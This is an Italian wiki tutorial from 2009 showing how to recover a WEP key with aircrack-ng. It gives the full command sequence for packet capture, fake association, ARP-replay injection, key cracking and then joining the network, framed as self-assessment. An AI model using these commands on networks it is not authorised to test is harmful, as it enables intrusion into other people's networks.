====== Craccare reti wifi di tipo Wep ======

Autore: **//Fabio Di Matteo//** \\ Ultima revisione: **//29/06/2009//** \\ \\
Di solito in casa o anche in piccoli uffici si utilizzano access point wireless basati sulla cifratura [[http://it.wikipedia.org/wiki/Wired_Equivalent_Privacy|Wep(Wired Equivalent Privacy)]], dal costo contenuto e facili da configurare. La cifratura si basa
su una //chiave spesso// a 64, 128 o 256 bit ovvero una sorta di "password" che condivisa tra access point e client permette di creare delle reti ed eventualmente di far navigare i client anche su internet tramite un gateway. \\
Nel seguito di questo articolo vedremo come ottenere questa chiave analizzando il traffico tra access point e client mediante gli strumenti forniti dalla suite  [[http://www.aircrack-ng.org/|aircrack-ng]] .
<note warning>**Questo articolo non vuole in alcun modo incoraggiare l'intrusione in reti e sistemi informatici**, piuttosto
vuole tentare di esporre in maniera concisa ed efficace l'uso di alcuni strumenti utilizzati per valutare la sicurezza
delle proprie reti.</note>



===== Procurarsi gli strumenti giusti =====

Ecco tutto quello che serve:

  * distribuzione GNU/Linux (meglio se recentissima);
  * Scheda di rete wireless supportata dal kernel e da aircrack (http://www.aircrack-ng.org/doku.php?id=install_drivers) ;
  * suite [[http://www.aircrack-ng.org/|aircrack-ng]] ;
\\
//In alternativa si puo' optare su [[http://www.remote-exploit.org/backtrack.html|Backtrack]] una distribuzione live e installabile incentrata sulla sicurezza .//


===== Scenario =====

Uno o piu' client che sono collegati alla rete mediante un access point wireless. **E' importante ,per la riuscita del crack, che vi sia almeno un client funzionante associato al nostro access point.**

===== Operazioni preliminari =====

E' utile settare in maniera fissa il bitrate della scheda di rete wifi con questo comando in modo da evitare 
bitrate variabili:
<file>iwconfig <dispositivo di rete> rate 1M </file>
 
===== Raccogliamo informazioni sulla rete =====
La prima cosa da fare e' senz'altro quella di dare uno sguardo alle nostre reti wireless in zona che vogliamo
testare e segnarci le seguenti informazioni:
  * Essid;
  * bssid;
  * canale. 
\\
per lo scopo puo' essere utile lanciare il comando :
<file>airodump-ng  <dispositivo di rete> </file>

===== Acquisiamo i pacchetti da analizzare =====

Diamo il via all'acquisizione dei pacchetti su file mediante il comando:
<file>airodump-ng -c <numero canale>  --band bg <dispositivo di rete> -w <prefisso files dove riporre cattura></file>

Verranno generati alcuni file con  un prefisso scelto da noi (es. "cattura") che serviranno ai programmi per tentare
di craccare le reti. Per velocizzare l'operazione e' stato utile specificare anche il canale con la
opzione -c <numero canale> .  \\ \\
**Questa procedura non deve essere interrotta fino a quando non si ottiene la chiave.**
=====Fake association e Injection =====

//Durante l' acquisizione// dei pacchetti e' importate effettuare gli attacchi "fake association" e "injection" per diminuire
il tempo necessario a ottenere gli IVS . E' da considerare che per craccare una rete WEP posssono essere necessari circa 50.000 //ivs// (a partire dalla versione 1.0 di aircrack-ng). \\ \\

verifichiamo che la nostra scheda di rete wifi supporti l'injection:
<file>aireplay-ng --test <dispositivo di rete></file>

==== Inizia l'attacco ====

Prima fase:
<file>aireplay-ng -1 0 -e <essid> -a <bssid> -h <nostro mac address> <dispositivo di rete> </file>
\\
Seconda fase:
<file>aireplay-ng -3 -b <bssid> -h <nostro mac address> <dispositivo di rete> </file>
\\
**Queste procedure non devono essere interrotte fino a quando non si ottiene la chiave.**

===== Decifriamo la chiave =====
In seguito si sottopongo i //file ottenuti con airodump// ad **aircrack-ng** in questo modo:
<file>aircrack-ng  *.cap </file>
Aircrack-ng al temine delle operazioni fornira' la chiave in formato esadecimale per l'accesspoint selezionato.


===== Colleghiamoci alla rete =====

**Puo' essere utile a questo punto un riavvio del nostro sistema operativo **
Ottenuta la chiave non ci resta che collegarci alla rete:
<file>
iwconfig <dispositivo di rete> essid [il nostro essid]
iwconfig <dispositivo di rete> key  [la nostra chiave wep]
iwconfig <dispositivo di rete> channel [il numero del canale radio] 
</file>

ed impostare gli indirizzi seguendo per esempio questo articolo [[rete:configurare_scheda_di_rete_con_ifconfig]], oppure se e' presente in rete un server DHCP e' sara' sufficiente un 
<file>dhclient</file>

===== Link utili =====
  * http://www.aircrack-ng.org/
  * http://frafra.wordpress.com/2007/10/12/cracking-di-una-rete-wifi-con-aircrack/
  * http://www.aircrack-ng.org/doku.php?id=newbie_guide  
  * http://www.aircrack-ng.org/doku.php?id=simple_wep_crack
  * http://www.aircrack-ng.org/doku.php?id=how_to_crack_wep_with_no_clients 
  * http://www.cdc.informatik.tu-darmstadt.de/aircrack-ptw/